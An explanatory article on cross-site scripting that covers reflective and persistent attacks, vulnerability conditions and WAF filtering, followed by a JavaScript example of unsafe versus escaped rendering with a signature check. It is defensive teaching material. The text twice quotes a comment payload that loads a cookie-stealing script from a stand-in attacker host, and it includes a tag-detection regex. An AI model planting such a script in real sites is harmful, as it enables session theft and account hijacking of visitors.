Cross-Site Scripting (XSS)
Cross-site scripting (XSS) is an attack in which an attacker injects malicious client-side code into a vulnerable web application. Unlike other web application attacks (such as SQL injection), the attacker is not directly targeting the application itself. Instead, the application is the means for attacking the application's users.
Although there are myriad reasons for an XSS attack, the more common ones are:
- Hijacking the user’s account
- Accessing the user’s browser history or private messages
- Exploiting the user’s web applications and devices, such as webcams, microphones, files, geolocation info, etc.
- Distributing web worms via the user’s browser
Often an XSS attack is the first step in an escalating series of more serious attacks. When combined with social engineering, an XSS attack can result in identity theft, keylogging, cookie theft, or phishing attacks.
An XSS attack embeds a malicious script into a vulnerable webpage, which is then executed by the user’s browser. A webpage is vulnerable if:
- User-supplied input is automatically added to HTML output; and
- Output to the browser is not escaped in a context-sensitive way (HTML body, attribute, JavaScript, URL), so user-supplied scripts can run
There are two primary types of XSS attacks: reflective and persistent.
Reflective (Unstored) XSS Attacks
In a reflective XSS attack, the attacker mimics a trusted person or organization so that a user clicks a link carrying a malicious script, which the application then reflects back in its response.
Persistent (Stored) XSS Attacks
A persistent XSS attack embeds malicious HTML tags — for example, script, body, img, iframe, input, link, object, table — directly into a vulnerable web application’s page. Blogs, social networks, video sharing platforms, and message boards are primary targets for persistent XSS attacks.
Unlike a reflective XSS attack, which activates an attack script only after a user clicks a malicious link, a persistent XSS attack only requires a visit to the compromised web page. This increases the reach of the attack, endangering all visitors regardless of their level of vigilance.
For example, an attacker discovers that an online news site allows HTML tags to be embedded in a page’s comment section. The attacker submits a comment that includes HTML tags, such as:
Great article! Read my review here <script src=http://attacksite.com/stealer.js></script>
Every visitor who views the comment now runs stealer.js in their browser, which sends the visitor's session cookie to the attacker. With the session cookies in hand, the attacker can hijack any visitor's account, accessing personal and confidential information without the knowledge or consent of the visitor.
Figure 1. Persistent XSS Attack
A web application firewall (WAF) is the most commonly used solution for protecting against XSS and other web application attacks. In the case of XSS attacks, most WAFs use signature-based filtering to identify and block malicious requests.
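Pulling together the two vulnerability conditions, the comment scenario, and the signature-based filtering just mentioned, here is an added example that is not code from the original article: a comment template rendered unsafely beside its escaped form, plus a minimal signature check. Function names and the `<li>` template are hypothetical; the comment text is the one from the scenario above.

```javascript
// Added example (not from the original article). Function names are hypothetical.

// Context-sensitive escaping for the HTML body context: these five characters
// are the ones that can break out of text content or a quoted attribute value.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: user-supplied input is concatenated straight into the HTML output,
// so a comment containing <script> becomes live markup for every visitor.
function renderCommentUnsafe(comment) {
  return `<li class="comment">${comment}</li>`;
}

// Hardened: same template, but the input is escaped for the HTML body context
// before insertion, so the browser shows the tag as text instead of running it.
function renderCommentSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// Signature-style check of the kind a WAF applies to incoming requests. It covers
// only the tags the article lists; real signature sets are far larger and still
// miss encoded variants, so output escaping remains the primary control.
const ACTIVE_TAG = /<\s*\/?\s*(script|body|img|iframe|input|link|object|table)\b/i;

function looksLikeXssPayload(input) {
  return ACTIVE_TAG.test(String(input));
}

// Constructed input: the comment from the news-site scenario.
const ATTACK_COMMENT =
  'Great article! Read my review here <script src=http://attacksite.com/stealer.js></script>';

console.log('unsafe :', renderCommentUnsafe(ATTACK_COMMENT));
console.log('safe   :', renderCommentSafe(ATTACK_COMMENT));
console.log('flagged:', looksLikeXssPayload(ATTACK_COMMENT));
```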